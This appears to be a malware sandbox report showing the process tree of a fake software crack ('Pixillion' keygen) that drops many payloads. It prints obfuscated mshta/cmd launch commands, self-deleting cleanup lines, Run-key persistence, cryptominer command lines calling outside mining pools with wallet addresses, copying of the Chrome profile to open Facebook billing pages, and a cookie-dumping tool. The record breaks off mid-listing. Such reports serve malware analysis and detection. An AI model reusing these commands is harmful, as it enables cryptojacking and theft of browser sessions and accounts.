                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:6088
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3952 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:6128
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1452 /prefetch:2
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:5224
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,5123305473181623177,1826984734735808996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:484
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:2604
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                  1⤵
                                                                                                                                    PID:2380
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                    1⤵
                                                                                                                                      PID:1924
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                      1⤵
                                                                                                                                        PID:1380
                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                        1⤵
                                                                                                                                          PID:1164
                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:1112
                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                            1⤵
                                                                                                                                              PID:344
                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                              1⤵
                                                                                                                                                PID:996
                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1120
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                  2⤵
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:1588
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:2632
                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:5692
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp2_Pixillion_Bildkonverter_2_crack.zip\Pixillion_Bildkonverter_2_crack.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp2_Pixillion_Bildkonverter_2_crack.zip\Pixillion_Bildkonverter_2_crack.exe"
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2888
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4284
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                          keygen-pr.exe -p83fsase3Ge
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4836
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4524
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                              5⤵
                                                                                                                                                                PID:5604
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                            keygen-step-1.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5052
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                            keygen-step-5.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:804
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbSCriPT: CLOSE ( CrEatEObJeCT ( "wSCRIPT.sHEll" ). RUN ( "Cmd.ExE /q /C tYPE ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"") do taskkill -f /IM ""%~NXM"" > nUL " , 0 ) )
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4420
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /C tYPE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe") do taskkill -f /IM "%~NXM" > nUL
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4280
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe
                                                                                                                                                                      uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5752
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbSCriPT: CLOSE ( CrEatEObJeCT ( "wSCRIPT.sHEll" ). RUN ( "Cmd.ExE /q /C tYPE ""C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe"" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If ""-Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe"") do taskkill -f /IM ""%~NXM"" > nUL " , 0 ) )
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:2536
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /C tYPE "C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe" > uxQGnaD~R.exe && sTART uxQGnaD~R.exe -Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA & If "-Po2lHh1jSzwWJO1z8Cc3l9nnS3~TMyA " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\uxQGnaD~R.exe") do taskkill -f /IM "%~NXM" > nUL
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:5888
                                                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            "C:\Windows\System32\regsvr32.exe" /s .\n~8Q.O -U
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                            PID:5984
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill -f /IM "keygen-step-5.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:1256
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                                    keygen-step-2.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                    PID:4312
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\A593.tmp.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\A593.tmp.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:5908
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\A593.tmp.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5276
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:5248
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5840
                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                            ping 127.0.0.1
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:4180
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                        keygen-step-3.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4216
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:5768
                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                              ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                              PID:2036
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                          keygen-step-4.exe
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4472
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                            PID:4568
                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:612
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:5220
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\AF66.tmp.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\AF66.tmp.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:6012
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AF66.tmp.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\AF66.tmp.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:6040
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\B12C.tmp.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\B12C.tmp.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:6016
                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w12561 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                PID:6100
                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w5258@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:5212
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:3364
                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                    ping 127.0.0.1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                    PID:4576
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                                PID:4716
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5228
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:5020
                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                    xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                    PID:5124
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    PID:4676
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff8242a4f50,0x7ff8242a4f60,0x7ff8242a4f70
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4796
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1680 /prefetch:8
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:4992
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1564 /prefetch:2
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5580
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2200 /prefetch:8
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5692
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5024
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:5592
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4996
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:5836
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1508,14877093545774198430,5121580469179908471,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:5784
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                    PID:4904
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5944
                                                                                                                                                                                                    • C:\ProgramData\8871450.exe
                                                                                                                                                                                                      "C:\ProgramData\8871450.exe"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:2736
                                                                                                                                                                                                    • C:\ProgramData\7289810.exe
                                                                                                                                                                                                      "C:\ProgramData\7289810.exe"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                      PID:6076
                                                                                                                                                                                                      • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                        "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:2680
                                                                                                                                                                                                    • C:\ProgramData\5678782.exe
                                                                                                                                                                                                      "C:\ProgramData\5678782.exe"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:5712
                                                                                                                                                                                                      • C:\ProgramData\5678782.exe
                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:6020
                                                                                                                                                                                                    • C:\ProgramData\6765916.exe
                                                                                                                                                                                                      "C:\ProgramData\6765916.exe"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:5088
                                                                                                                                                                                                    • C:\ProgramData\3728055.exe
                                                                                                                                                                                                      "C:\ProgramData\3728055.exe"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:2280
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                    PID:1288
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:2284
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:4108
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:5624
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
